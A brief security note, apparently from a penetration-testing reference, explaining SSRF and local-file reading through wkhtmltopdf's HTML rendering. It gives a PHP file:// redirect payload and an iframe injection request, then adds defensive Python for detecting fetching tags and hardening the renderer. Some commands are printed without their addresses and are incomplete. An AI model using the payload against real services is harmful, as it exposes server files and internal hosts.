wkhtmltopdf SSRF

Last modified: 2023-04-08


wkhtmltopdf is a command-line tool that renders HTML into PDF using Qt WebKit. When it renders HTML that an attacker controls, it is vulnerable to SSRF, because the renderer fetches whatever URLs the markup references.


Create a PHP payload that redirects the renderer to a local file:

<?php header('location:file://'.$_REQUEST['x']); ?>

Then start a web server on the local machine:

php -S

Send a request to the endpoint where wkhtmltopdf renders user-supplied HTML. For example:

/htmltopdf?item=<iframe src= width=1000px height=1000px></iframe>

The generated PDF now shows the system's user list.
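As an added defensive example (not part of the original note, and not code from the wkhtmltopdf project), the Python below shows the two fixes a service owner would apply: detect markup in user input that would make the renderer issue a request (iframe, img, script and similar), and embed user input as escaped text while invoking wkhtmltopdf with its `--disable-local-file-access` and `--disable-javascript` options. The sample iframe pointing at 192.0.2.10 is a constructed input, and the helper names are my own.

```python
import html
from html.parser import HTMLParser

# Elements whose URL attribute makes the renderer fetch a resource while the
# PDF is built; untrusted markup containing them is a request-forgery vector.
FETCHING_TAGS = {"iframe", "frame", "img", "script", "link", "object",
                 "embed", "source", "video", "audio"}
URL_ATTRS = {"src", "href", "data"}


class _FetchScanner(HTMLParser):
    """Collects (tag, url) pairs for elements that would trigger a fetch."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):  # also called for <img ... />
        if tag in FETCHING_TAGS:
            for name, value in attrs:
                if name in URL_ATTRS:
                    self.hits.append((tag, value or ""))


def find_fetching_elements(untrusted_html):
    """Return elements in user-supplied HTML that would make wkhtmltopdf
    issue a request; use it to reject or alert on the input before rendering."""
    scanner = _FetchScanner()
    scanner.feed(untrusted_html)
    scanner.close()
    return scanner.hits


def build_render_command(item_text, out_path):
    """Embed user input as escaped text, never as markup, and build an argv
    that disables local file access and JavaScript in the renderer.
    Returns (argv, html_page); the page is meant to be piped to stdin ('-')."""
    page = "<html><body><p>{}</p></body></html>".format(
        html.escape(item_text, quote=True))
    argv = ["wkhtmltopdf", "--disable-local-file-access",
            "--disable-javascript", "-", out_path]
    return argv, page


# Constructed sample resembling the iframe shape from the note above.
SAMPLE = '<iframe src="http://192.0.2.10/" width=1000px height=1000px></iframe>'
```

Disabling local file access only stops file:// loads; the renderer can still be pointed at internal HTTP services, so the process also needs restricted network egress.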